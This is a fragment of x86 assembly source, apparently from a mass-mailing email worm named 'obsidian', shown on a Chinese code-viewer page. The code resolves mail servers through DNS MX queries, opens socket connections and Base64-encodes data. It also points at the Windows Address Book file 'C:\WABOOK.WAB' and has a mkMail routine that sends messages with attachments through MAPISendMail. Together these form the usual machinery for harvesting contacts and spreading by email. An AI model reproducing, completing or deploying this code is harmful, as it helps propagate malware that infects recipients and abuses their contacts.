📄 obsidian.asm
字号:
call lstrlenA, offset szQuery
mov edi, offset dnsBuffer
add edi, eax
add edi, 30
call GetDomainName, offset dnsBuffer, edi, offset szQuery2
call RtlZeroMemory, offset dnsBuffer, 1000
call RtlZeroMemory, offset szQueryLabels, 100
call ConnectToHost, offset hSock, offset szQuery2, 53, SOCK_DGRAM
cmp eax, -1
je smtpFailure
call TimeOut, hSock, 5000
; convert the domain name to labels
call StringToLabels, offset szQuery, offset szQueryLabels
; query the DNS server for a list of MX(mail exchage) records
call QueryDNS, hSock, offset dnsBuffer, 1000, offset szQueryLabels, DNS_TYPE_MX, DNS_CLASS_IN
cmp eax, -1
je smtpFailure
; terminate connection
call closesocket, hSock
; get the first email server name in the message
call lstrlenA, offset szQuery
mov edi, offset dnsBuffer
add edi, eax
add edi, 32
call GetDomainName, offset dnsBuffer, edi, offset szSMTP
xor eax, eax
ret
smtpFailure:
call closesocket, hSock
mov eax, -1
ret
GetSmtpDomain ENDP
GetDomainName PROC buf:DWORD, source:DWORD, dest:DWORD
;
; This function retrieves a domain name from a query message
;
mov esi, source
mov edi, dest
mov cl, [esi]
copyLabel:
inc esi
mov al, [esi]
mov [edi], al
inc edi
dec cl
cmp cl, 0
jne copyLabel
inc esi
cmp byte ptr [esi], -64
je appendLabel
cmp byte ptr [esi], 0
je domainComplete
mov cl, [esi]
mov byte ptr [edi], '.'
inc edi
jmp copyLabel
domainComplete:
xor eax, eax
ret
appendLabel:
xor eax, eax
mov al, [esi+1]
add eax, buf
mov esi, eax
mov cl, [esi]
mov byte ptr [edi], '.'
inc edi
jmp copyLabel
GetDomainName ENDP
QueryDNS PROC sock:DWORD, buf:DWORD, size:DWORD, name:DWORD, type:WORD, class:WORD
;
; This function queries a DNS server
;
; Create the query header
mov edi, offset buf
call htons, 3
mov word ptr [edi], ax ; query ID
mov word ptr [edi+2], 0 ; flags
call htons, 1
mov word ptr [edi+4], ax ; question entries
mov word ptr [edi+6], 0 ; answer entries
mov word ptr [edi+8], 0 ; authority entries
mov word ptr [edi+10], 0 ; resource entries
; copy domain name to the buffer
mov eax, buf
add eax, 12
call lstrcpyA, eax, name
; seek past the domain name
call lstrlenA, name
mov edi, buf
add edi, eax
add edi, 13
; write the query type
call htons, type
mov [edi], ax
; write the query class
call htons, class
mov [edi+2], ax
; send the query message to the DNS server
call sendto, [sock], buf, 100, 0, 0, 0
cmp eax, -1
je queryFailure
; recieve the query response
call recvfrom, [sock], buf, size, 0, 0, 0
cmp eax, -1
je queryFailure
; check to see if the query got an answer
mov edi, buf
cmp word ptr [edi+6], 0
je queryFailure
xor eax, eax
ret
queryFailure:
mov eax, -1
ret
QueryDNS ENDP
StringToLabels PROC source:DWORD, dest:DWORD
;
; This function converts a zero terminated domain name into
; a series of labels that the DNS server understands
;
mov esi, source
mov edi, dest
inc edi
xor cl, cl
mov edx, dest
findDot:
cmp byte ptr [esi], '.'
je writeTotal
cmp byte ptr [esi], 0
je convertComplete
mov al, [esi]
mov [edi], al
inc esi
inc edi
inc cl
jmp findDot
convertComplete:
mov byte ptr [edx], cl
mov edx, edi
mov byte ptr [edi], 0
ret
writeTotal:
mov byte ptr [edx], cl
xor cl, cl
mov edx, edi
inc edi
inc esi
jmp findDot
StringToLabels ENDP
ConnectToHost PROC lpSocket:DWORD, lpHostName:DWORD, port:DWORD, protocol:DWORD
;
; This function connects to a host:port
;
; Create a socket
call socket, AF_INET, protocol, PCL_NONE
mov ebx, [lpSocket]
mov [ebx], eax
cmp eax, -1
je connFailed
; Create address
mov SockAddress.sin_family, AF_INET
call htons, port
mov SockAddress.sin_port, ax
call gethostbyname, lpHostName
cmp eax, 0
je connFailed
mov eax, [eax+12]
mov eax, [eax]
mov eax, [eax]
mov SockAddress.sin_addr, eax
; connect to address
mov ebx, [lpSocket]
call connect, dword ptr [ebx], offset SockAddress, 16
cmp eax, 0
jne connFailed
; return success code
xor eax, eax
ret
connFailed:
; close the socket
mov ebx, [lpSocket]
call closesocket, dword ptr [ebx]
; return failure code
mov eax, -1
ret
ConnectToHost ENDP
TimeOut PROC sock:DWORD, milliseconds:DWORD
;
; Set the timeout for sending and recieving data
;
mov eax, milliseconds
mov IOTimeOut, eax
call setsockopt, sock, SOL_SOCKET, SO_RCVTIMEO, offset IOTimeOut, 4
call setsockopt, sock, SOL_SOCKET, SO_SNDTIMEO, offset IOTimeOut, 4
ret
TimeOut ENDP
Base64Encode PROC threeBytes:DWORD, fourBytes:DWORD
;
; Converts 3 ASCII bytes to 4 Base64 encoded bytes
;
mov esi, threeBytes
mov edi, fourBytes
; reverse the byte order
mov al, [esi+2]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi]
mov [edi+2], al
mov byte ptr [edi+3], 0
mov eax, [edi]
; convert first 6 bits
push eax
and eax, 0FC0000h
shr eax, 18
call addBase
mov [edi], al
pop eax
; convert second 6 bits
push eax
and eax, 3F000h
shr eax, 12
call addBase
mov [edi+1], al
pop eax
; convert third 6 bits
push eax
and eax, 0FC0h
shr eax, 6
call addBase
mov [edi+2], al
pop eax
; convert forth 6 bits
push eax
and eax, 3Fh
call addBase
mov [edi+3], al
pop eax
ret
addBase:
cmp al, 25
jle add65
cmp al, 51
jle add71
cmp al, 61
jle sub4
cmp al, 62
je mov43
cmp al, 63
jmp mov47
add65: add al, 65
ret 0
add71: add al, 71
ret 0
sub4: sub al, 4
ret 0
mov43: mov al, 43
ret 0
mov47: mov al, 47
ret 0
Base64Encode ENDP
mkMail:
mov eax,dword ptr [recordPosition]
mov dword ptr[MsgFrom+8],eax ;msgFrom
add eax,50
mov dword ptr[mmMessage+4],eax ;Subject
add eax,50
mov dword ptr[mmMessage+8],eax ;Message
add eax,100
mov dword ptr[Attach+10h],eax ;Attach
xor eax,eax
push eax
push eax
push offset mmMessage
push eax
push [hdMapi]
call MAPISendMail
ret
szWabook DB 'C:\WABOOK.WAB',0
szAttach DB 64 DUP(0)
hdMapi DD 0
mmMessage DD 0
DD 0 ;Subject
DD 0 ;Message
DD 0
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ? ;MailFrom
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
Mail2 dd offset emailAddressASC
dd offset emailAddressASC
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset szAttach
dd ? ;AttachName
dd ?
End Main ; End of code
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -